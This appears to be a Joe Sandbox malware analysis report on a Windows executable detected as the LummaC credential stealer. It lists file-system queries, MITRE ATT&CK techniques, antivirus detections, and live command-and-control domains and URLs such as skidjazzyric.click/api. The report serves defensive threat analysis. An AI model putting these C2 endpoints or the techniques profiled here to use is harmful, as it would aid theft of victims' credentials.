Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\JSDNGYCOWY	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DPlvBkg4aj.exe PID: 1068, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: DPlvBkg4aj.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Virtualization/Sandbox Evasion	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DPlvBkg4aj.exe	50%	ReversingLabs	Win32.Trojan.Generic
DPlvBkg4aj.exe	52%	Virustotal		Browse
DPlvBkg4aj.exe	100%	Avira	HEUR/AGEN.1312582
DPlvBkg4aj.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
soundtappysk.shop	100%	Avira URL Cloud	malware
https://skidjazzyric.click/	100%	Avira URL Cloud	malware
apporholis.shop	100%	Avira URL Cloud	malware
versersleep.shop	100%	Avira URL Cloud	malware
https://skidjazzyric.click/api	100%	Avira URL Cloud	malware
robinsharez.shop	100%	Avira URL Cloud	malware
crowdwarek.shop	100%	Avira URL Cloud	malware
skidjazzyric.click	100%	Avira URL Cloud	malware
chipdonkeruz.shop	100%	Avira URL Cloud	malware
handscreamny.shop	100%	Avira URL Cloud	malware
https://skidjazzyric.click/apix	100%	Avira URL Cloud	malware
femalsabler.shop	100%	Avira URL Cloud	malware
https://skidjazzyric.click:443/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
skidjazzyric.click	104.21.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
robinsharez.shop	true	Avira URL Cloud: malware	unknown
versersleep.shop	true	Avira URL Cloud: malware	unknown
https://skidjazzyric.click/api	true	Avira URL Cloud: malware	unknown
soundtappysk.shop	true	Avira URL Cloud: malware	unknown
crowdwarek.shop	true	Avira URL Cloud: malware	unknown
skidjazzyric.click	true	Avira URL Cloud: malware	unknown
apporholis.shop	true	Avira URL Cloud: malware	unknown
handscreamny.shop	true	Avira URL Cloud: malware	unknown
chipdonkeruz.shop	true	Avira URL Cloud: malware	unknown
femalsabler.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/	DPlvBkg4aj.exe, 00000000.00000003.1722485507.0000000000739000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.3.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	DPlvBkg4aj.exe, 00000000.00000003.1734684614.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734785322.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723755981.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723813962.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734981026.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	DPlvBkg4aj.exe, 00000000.00000003.1734684614.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734785322.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723755981.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723813962.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734981026.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microh	DPlvBkg4aj.exe, 00000000.00000003.1722583194.0000000000752000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1722485507.0000000000739000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	DPlvBkg4aj.exe, 00000000.00000003.1723813962.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	DPlvBkg4aj.exe, 00000000.00000003.1723755981.0000000002EDB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	DPlvBkg4aj.exe, 00000000.00000003.1749410523.0000000002EC2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/apix	DPlvBkg4aj.exe, 00000000.00000003.1734895986.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1734753371.0000000002E87000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://skidjazzyric.click:443/api	DPlvBkg4aj.exe, 00000000.00000002.1934935562.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	DPlvBkg4aj.exe, 00000000.00000003.1723813962.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	DPlvBkg4aj.exe, 00000000.00000003.1750438722.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	DPlvBkg4aj.exe, 00000000.00000003.1723336000.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723479315.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723277840.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.112.1	skidjazzyric.click	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586487
Start date and time:	2025-01-09 08:12:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DPlvBkg4aj.exe renamed because original name is a hash value
Original Sample Name:	055bf072e4fa602afb77f598390a4dd6.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 20 Number of non-executed functions: 228
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212, 20.190.160.22, 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:13:25	API Interceptor	5x Sleep call for process: DPlvBkg4aj.exe modified
02:13:47	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
104.21.112.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
skidjazzyric.click	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	GR7ShhQTKE.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	ab89jay39E.exe	Get hash	malicious	LummaC	Browse	104.21.64.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://qr.me-qr.com/PVhBu5SR	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://join.grass-io.cc	Get hash	malicious	Unknown	Browse	104.18.18.237
	https://qr.me-qr.com/pt/E9k76ew	Get hash	malicious	Unknown	Browse	188.114.96.3
	watchdog.elf	Get hash	malicious	Xmrig	Browse	1.1.1.1
	https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://rinderynitvye.blogspot.com/	Get hash	malicious	CAPTCHA Scam ClickFix, Phisher	Browse	188.114.97.3
	https://lap.gnoqwwhpwe.ru/3aeK/#Dmestevao@iif.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	Condenast eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://mail.voipmessage.uk/XZmNVMGRWSjAyR3hxcDF0LzhSdGt1ZFZjdG0vUU9uWWRDQXI2eXJwbnNYd0FnNE9TWjhBNncyakhQSlRKa0poSEVkY09KRzlaVG9SSGM4NSt2bHh3M0h4eHpwKzZNZlpMUU9rWklrRlg2R0R3ak9qbVA4T21TZXpzYUxJazlsaVo0ODNubmNtS1ZuQTdWL1dLa3kvZVpKeU5WOUJWUVRFMHcxRWhsODJKQTdVV2NSUmloaFBtRWdiL1lGQ0VCOTNUUjVmSE1nPT0tLVpvYUVQQVVmdkNSZmR3ZUItLWhoMjNyU1ZFSWhzclZVc0cwdTEwS0E9PQ==?cid=305193241	Get hash	malicious	KnowBe4	Browse	104.17.247.203
	dropper.exe	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwE	Get hash	malicious	Unknown	Browse	104.21.112.1
	web55.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.112.1
	Rgr8LJz.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	random.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	asd.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	wRhEMj1swo.exe	Get hash	malicious	Unknown	Browse	104.21.112.1
	chu4rWexSX.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	xHj1N8ylIf.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	GR7ShhQTKE.exe	Get hash	malicious	LummaC	Browse	104.21.112.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DPlvBkg4aj.exe_f3aec8244cf9d96c24b77ddebd7d9fdce36e4d3_34754915_ad9c4594-ba12-46c5-bc36-d9ade0714d88\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0635689683852383
Encrypted:	false
SSDEEP:	384:KruL8LXSkbwiOmwjLjL5zuiFcqY4IO8zkl:KruL8e4wiOmwjLjFzuiFcqY4IO8zk
MD5:	03C20A436EB73F05C6A929523069C347
